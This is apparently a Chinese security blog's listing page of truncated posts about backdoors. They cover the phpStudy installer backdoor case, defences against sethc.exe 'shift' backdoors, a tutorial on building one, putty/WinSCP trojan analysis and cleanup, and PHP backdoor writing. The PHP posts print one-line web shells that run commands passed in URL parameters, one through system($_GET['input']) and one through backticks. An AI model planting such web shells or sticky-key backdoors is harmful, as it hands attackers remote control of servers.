phpstudy官网被黑客入侵安装包存在后门,现已抓获!

其中,西湖警方破获一起以马某为首的非法控制计算机信息系统、诈骗案,抓获团伙成员7人,缴获了大量涉案物品,该团伙非法控制计算机67万余台,非法获取账号密码类、聊天数据类、设备码类等数据10万余组,非法牟利600余万元;桐庐警方一举捣毁多起团伙开设赌场案,成功捣毁8个犯罪团伙,抓获犯罪嫌疑人50余名,采取刑事强制措施40余名,查扣涉案电脑、手机80余台,银行卡60余张、账本10余本,涉案抽头获利资金4...

- 阅读全文 -

禁止sethc.exe运行 防止3389的sethc后门

以Windows 2003为例,启动Windows 2003组策略 点“开始”,在“运行”中敲入gpedit.msc依次展开“用户配置”→“管理模板”→“系统”子键,此时可以看到一个“不要运行指定的Windows应用程序”选项,双击该选项,在“策略”选项卡中选择“启用”选项,启动Windows 2003禁止运行指定应用程序的功能,单击“不允许的应用程序的列表”中的“显示”按钮,打开列表框,在列表框...

- 阅读全文 -

shift后门制作和超级帐户的建立

        前段时间去一个流量过百万的站的服务器上参观,朋友加了一个shift后门并称该后门是很久以前他公布的,具体情况我也没多问,回来后自己也做了一个加密码的shift后门.利用winrar加密的.很简单,火力群里一个小弟弟问我怎么做的,叫我写个说明,那么我就简单介绍一下制作过程-Amxking   1.我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为AK.bat的文件.  ...

- 阅读全文 -

关于php后门的编写

0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写   system() <?php system($_GET['input']); ?> http://192.168.247.133:81/shell.php?input=dir &nbs...

- 阅读全文 -

报复微软为政府加后门:Skype源代码被泄露

PasteBay上刚刚发布的一个帖子宣称,Skype的源代码已经被黑客完整地泄露出来,而此举主要是为了报复微软,这家软件帝国在85亿美元收购了Skype之后在程序中偷偷加入了后门,以方便政府监控,这与之前尊重隐私的做法完全背道而驰。 黑客还指责微软与每一个政府部门都有合作,甚至包括突尼斯、叙利亚等等,而且已经在叙利亚造成了很多人的死亡。 真假有待验证,感兴趣的可以找把梯子弄个BT种子来玩玩看,反正...

- 阅读全文 -

一个官方没有公布的php秘籍,可用作后门

发现这个也是巧合,我就直接说了吧 <?php //t.php $test = $_GET['r']; echo `$test`; ?> 大家看看这个代码有木有问题? 这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 信息安全团队 而且又不是单引号,这个就是关键所...

- 阅读全文 -

某虚拟主机评测源码内置后门

为防止遭恶意利用,不公开关键词,请作者理解 存在页面 AdminIncludecodeCode.asp AdminIncludemd5.asp 菜刀连接。 提示:该后门删除只要去掉这一行就可以了,对该程序官方表示BS 作者:CrackerMrX

- 阅读全文 -

防止替换shift后门提权(sethc.exe后门)

   在很多情况下,在提权比较艰难的时候,替换shift后门提权很方便,为了防止shift后门被利用,得对它设置权限。防止简单替换shift后门提权。 一、sethc.exe存在于 c:\windows\system32\sethc.exe和c:\windows\system32\dllcache\sethc.exe 这2个目录之下 为了防止简单替换sethc.exe提权,可对sethc.exe设...

- 阅读全文 -

putty和WinSCP后门检查及清理方式

检查及清理方式   检查/var/log 是否被删除# /usr/bin/stat /var/log   如果被删除了,说明中招了   查看/var/log 文件夹内容# ls -al /var/log   如果文件很少,说明中招了   监控名称为fsyslog,osysllog 的进程# /usr/bin/watch -n 1 /bin/ps -AFZ f \| /bin/grep syslog...

- 阅读全文 -

创宇安全研究团队:中文版putty后门事件分析

近几日,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动 窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上。知道创宇安全研究小组在第一时间获取该消息后,对此次事件进行了跟踪和分析。根据分 析,此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、 WinSCP、SSHSecure和psftp...

- 阅读全文 -